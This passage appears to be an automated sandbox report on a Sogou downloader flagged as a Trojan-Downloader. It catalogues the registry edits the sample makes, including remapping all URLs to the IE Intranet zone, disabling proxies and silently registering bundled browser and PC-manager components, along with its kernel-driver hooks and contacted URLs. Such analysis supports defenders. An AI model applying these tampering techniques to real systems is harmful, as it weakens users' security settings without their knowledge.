"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E6 AB 12 F5 FF 96 C7 C6 86 90 81 7E FA 1B 35 6B"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process regsvr32.exe:2300 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"(Default)" = "{5FD70451-714E-495A-9F17-450AEF3AA35E}"
[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp\bits]
"0" = "04 00 00 00 FF FF FF FF 52 49 46 46"
[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\HELPDIR]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp"
[HKCR\WEBPFilter.CoWEBPFilter]
"(Default)" = "WEBPFilter CoWEBPFilter"
[HKCR\WEBPFilter.CoWEBPFilter\CurVer]
"(Default)" = "WEBPFilter CoWEBPFilter.1"
[HKCR\WEBPFilter.CoWEBPFilter.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"Image Filter CLSID" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCR\MIME\Database\Content Type\image/webp]
"CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"
[HKCR\AppID\WebpDecodeFilter.DLL]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"
[HKCR\.webp]
"Content Type" = "image/webp"
[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter.1"
[HKCR\WEBPFilter.CoWEBPFilter.1]
"(Default)" = "WEBPFilter CoWEBPFilter"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"(Default)" = "WEBPFilter.CoWEBPFilter"
[HKCR\MIME\Database\Content Type\image/webp]
"Image Filter CLSID" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCR\WebpDecodeFilter.WebpImageDecodeFilt.1]
"(Default)" = "WebpImageDecodeFilter Class"
[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}]
"(Default)" = "IWebpImageDecodeFilter"
[HKCR\WebpDecodeFilter.WebpImageDecodeFilter]
"(Default)" = "WebpImageDecodeFilter Class"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
"(Default)" = "WEBPFilter.CoWEBPFilter"
[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
"AppID" = "{A629F59C-66C9-4775-901A-A017530E3958}"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCR\.webp]
"PerceivedType" = "image"
[HKCR\MIME\Database\Content Type\image/webp\bits]
"0" = "04 00 00 00 FF FF FF FF 52 49 46 46"
[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\FLAGS]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E DC 08 B9 FB 1A 6C 76 B7 30 9D 7C 45 CC 2A 46"
[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"CLSID" = "{25336920-03F9-11cf-8FD0-00AA00686F13}"
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll"
[HKCR\Interface\{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}\TypeLib]
"Version" = "1.0"
[HKCR\AppID\{A629F59C-66C9-4775-901A-A017530E3958}]
"(Default)" = "WebpDecodeFilter"
[HKCR\WEBPFilter.CoWEBPFilter\CLSID]
"(Default)" = "{E577DC7C-F3A8-4A79-A2B0-8E0A79FFA45B}"
[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CLSID]
"(Default)" = "{A981255C-6123-4487-B21A-9CF468EB3FC7}"
[HKCR\WebpDecodeFilter.WebpImageDecodeFilter\CurVer]
"(Default)" = "WebpDecodeFilter.WebpImageDecodeFilt.1"
[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0\0\win32]
"(Default)" = "%Documents and Settings%\%current user%\Application Data\QB\9.3.7078.400\webp\WebpDecodeFilter.dll"
[HKCU\Software\Tencent\QQBrowser\IE8\MIME\Database\Content Type\image/webp]
"Extension" = ".webp"
[HKCR\MIME\Database\Content Type\image/webp]
"Extension" = ".webp"
[HKCR\TypeLib\{5FD70451-714E-495A-9F17-450AEF3AA35E}\1.0]
"(Default)" = "webpdecodefilter 1.0 Type Library"
The Trojan-Downloader deletes the following registry key(s):
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\TypeLib]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\InprocServer32]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\VersionIndependentProgID]
[HKCR\CLSID\{A981255C-6123-4487-B21A-9CF468EB3FC7}\ProgID]
The process regsvr32.exe:808 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\TypeLib]
"Version" = "1.0"
[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\HELPDIR]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79"
[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}]
"(Default)" = "IGameDownload"
[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\TypeLib]
"Version" = "1.0"
[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Descripton" = "搜狗高速下载控件"
[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"
[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Path" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"
[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"
[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}]
"(Default)" = "DownLoadBHO Class"
[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"ProductName" = "搜狗高速下载助手"
[HKLM\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
"1" = "搜狗高速下载助手"
[HKCR\Interface\{6D89601E-1736-40FB-A3A5-84A376F286D0}]
"(Default)" = "IDownLoadBHO"
[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{64608416-BAFE-43A2-91C4-324C6CA4EF52}\TypeLib]
"(Default)" = "{13D91BAE-B37C-41C3-AE86-463E53990546}"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 55 7B 66 E4 AF 14 82 F6 0E 54 49 CE 45 A6 FF"
[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"Version" = "3.1.13.79"
[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0]
"(Default)" = "SogouDownLoadLib"
[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\0\win32]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"
[HKLM\SOFTWARE\MozillaPlugins\@sogou.com/SGDownloadPlugin]
"vendor" = "Sogou.com Inc."
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
"1" = "搜狗高速下载助手"
[HKCR\TypeLib\{13D91BAE-B37C-41C3-AE86-463E53990546}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{D1871D0A-4929-4A3C-AAE5-684235E62244}\InprocServer32]
"(Default)" = "%Program Files%\SogouSoftware\3.1.13.79\npdownload.dll"
The Trojan-Downloader deletes the following registry key(s):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome\EnabledPlugins]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google\Chrome]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}User]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine\SOFTWARE\Policies\Google]
[HKCU\Software\Microsoft\Windows\CurrentVersion\Group Policy Objects\{1D7AE9A8-275C-4101-B468-DA9A75E5AD8E}Machine]
The process regsvr32.exe:3168 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 05 E1 6D EA E7 4E 49 E7 9A 54 DC ED 37 27 C0"
[HKCR\qmgcfiles\ShellEx\IconHandler]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"
[HKCR\.qmgc]
"(Default)" = "qmgcfiles"
[HKCR\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\shellex\ContextMenuHandlers\QRec]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\.QMDeskTopGCIcon]
"(Default)" = "{B7667919-3765-4815-A66D-98A09BE662D6}"
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\ProgID]
"(Default)" = "QQPCMgr.GarbageCleaner.1"
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}]
"AppID" = ""
"(Default)" = "PCMgr Garbage Cleaner ShellExtension"
[HKCR\qmgcfiles\DefaultIcon]
"(Default)" = "%Program Files%\Tencent\QQPCMgr\11.5.17499.219\QMGCShellExt.dll,1"
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\VersionIndependentProgID]
"(Default)" = "QQPCMgr.GarbageCleaner"
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
"ThreadingModel" = "Apartment"
The Trojan-Downloader deletes the following registry key(s):
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\InprocServer32]
[HKCR\qmgcfiles\ShellEx\IconHandler]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\VersionIndependentProgID]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\Programmable]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\.QMDeskTopGCIcon]
[HKCR\CLSID\{B7667919-3765-4815-A66D-98A09BE662D6}\ProgID]
The process TsService.exe:3568 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 3E 6F 3B 0D 64 8D A9 26 31 06 F0 E2 89 3B 6F"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKU\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all URLs to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan-Downloader modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan-Downloader modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan-Downloader deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process TsService.exe:3448 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 9A CB CC 51 D7 F5 F3 18 8A 09 E1 DA BE 0D 2A"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"QBServiceExeName" = "TsService.exe"
"InstallTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Tencent\QQBrowser]
"QBServiceName" = "TxQBService"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
The process cacls.exe:3344 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 95 82 AC 23 7D 4E 7E F9 5A 7E 51 F2 C8 34 E0"
The process UpdateService.exe:628 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 B4 4D E2 74 AA A7 37 F7 90 F1 37 6D 6B 5F 21"
The process UpdateService.exe:1880 makes changes in the system registry.
The Trojan-Downloader creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 1F C6 14 0A 8A A3 4A 8F A4 CD 70 CB E5 42 E0"
Dropped PE files
HOSTS file anomalies
No changes have been detected.
Rootkit activity
Using the driver "%System%\drivers\TsQBDrv.sys", the Trojan-Downloader controls the creation and closing of processes by installing a process notifier.
Using the driver "%System%\drivers\TsQBDrv.sys", the Trojan-Downloader controls the loading of executable images into memory by installing a load image notifier.
Using the driver "%System%\drivers\TsQBDrv.sys", the Trojan-Downloader controls operations on the system registry by installing a registry notifier.
The Trojan-Downloader installs the following kernel-mode hooks:
NtCreateSection
NtMapViewOfSection
ZwProtectVirtualMemory
ZwCreateThread
ZwTerminateProcess
ZwQueryValueKey
ZwCreateKey
ZwOpenKey
Propagation
VersionInfo
Company Name: Sogou.com Inc.
Product Name: ????
Product Version: 3.1.12.94
Legal Copyright: (c) 2014 Sogou.com Inc. All rights reserved.
Legal Trademarks:
Original Filename: MiniDownLoad.exe
Internal Name: MiniDownLoad.exe
File Version: 3.1.12.94
File Description: ????
Comments:
Language: English (Canada)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 179921 | 180224 | 4.60592 | 0629a4d96cd09184d5b71419ddf1ea48 |
| .rdata | 184320 | 31526 | 31744 | 3.37334 | ad64d3debeed262d95252d1a88767ce9 |
| .data | 217088 | 16416 | 7168 | 2.74403 | 8d5457a5ab90baaf932af06d428c08cb |
| .rsrc | 237568 | 2139704 | 2140160 | 5.50059 | b3aa9087b2f8e3a00a89d7e9379013b9 |
| .reloc | 2379776 | 17914 | 17920 | 2.83903 | 5cff4fd471f67ecfd435f6daffd9a2e4 |
URLs
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-7654919934142823378.png&r=null | |
| hxxp://imgstore.cdn.sogou.com/v2/thumb/retype/ext/auto/cls/imagick?appid=200504&url=hxxp://www1.pconline.com.cn/download/zt/2013/ico/pc4848.jpg | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641991 | |
| hxxp://zs.xiazai.sogou.com/pc_assist/install_check.php | |
| hxxp://58.254.134.238:80/ | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=5&servicestate=4&rand=1463641994 | |
| hxxp://xz.sogou.com/img/recommend-btn.png | |
| hxxp://xz.sogou.com/ie-css3.htc | |
| hxxp://zs.xiazai.sogou.com/pc_assist/newversion_info.php | |
| hxxp://dl.app.sogou.com/128128.png | |
| hxxp://t.sogou.com/update_platform/update.php?appname=sogoudownload_bindsecontrol&v=1.0.0.0 | |
| hxxp://img01.sogoucdn.com/app/a/10190001/381427456234840 | |
| hxxp://xz.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=software&unc=sogousoftware_normal&pcid=2320808333768086190&mode=recommend | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=310&num=1&rand=1463641995 | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=100&tasktype=2&pcid=2320808333768086190&downloadtype=software&softname=WiFi共享大师&extension=exe&rand=1463641995 | |
| hxxp://yze.t.sogou.com/cooperation/popuprecommend/installfinishbind-qqbrowser.xml | |
| hxxp://yz.app.sogou.com/appinfo?num=13897 | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4871856506745242874.png&r=null | |
| hxxp://xz.sogou.com/softassis/img/ranking-ico.png | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/4669602030091557924.png&r=null | |
| hxxp://xz.sogou.com/softassis/img/loading.gif | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=230&bindtype=thirdparty_pcmgr_qb&bindname=pcmgr&weight=0&scheme=&rand=1463641988 | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=232&bindtype=installfinishbind&bindname=QQBrowser&weight=0&scheme=a&errortype=1&rand=1463641995 | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXh0000o30f--&unc=sogousoftware_normal&t=10&rand=1463641970 | |
| hxxp://zs.xiazai.sogou.com/pc_assist/soft_info.php?fields=logo_url | |
| hxxp://58.254.134.209:80/ | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3230604409881581210.png&r=null | |
| hxxp://yze.t.sogou.com/externalapp/SogouSoftwareExternalApp.exe | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/66/link?appid=66&url=http://dl.app.sogou.com/pc_logo/yijianchongzhuang_745x240.png&r= | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/2040683535505104749.png&r=null | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/1882834511144817344.png&r=null | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=234&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6542522661282298716.png&r=null | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-1433550905860313072.png&r=null | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=1&rand=1463641985 | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=4&activatetype=download&rand=1463641993 | |
| hxxp://ping.t.sogou.com/pingd?srctype=sogousoftware&gid=62agYz9IIybkYjVuQBlBXj4djMo30000&unc=sogousoftware_normal&t=233&bindtype=thirdparty_pcmgr_qb&bindname=QQBrowser&weight=1&scheme=&rand=1463642028 | |
| hxxp://123.129.242.154:80/ | |
| hxxp://xz.sogou.com/softRecommend | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-3080605666447722537.png&r=null | |
| hxxp://xz.sogou.com/handleUserIdDb256?userid=182290f2326cb222d4f13e5ed25565ed&downloadtype=bpackage&unc=sogousoftware_normal&pcid=0&mode=recommend | |
| hxxp://cmc.imgstore.cdn.sogou.com/net/a/16/link?appid=16&url=http://dl.app.sogou.com/pc_logo/-6699374927030488929.png&r=null | |
| hxxp://xz.sogou.com/softRanking | |
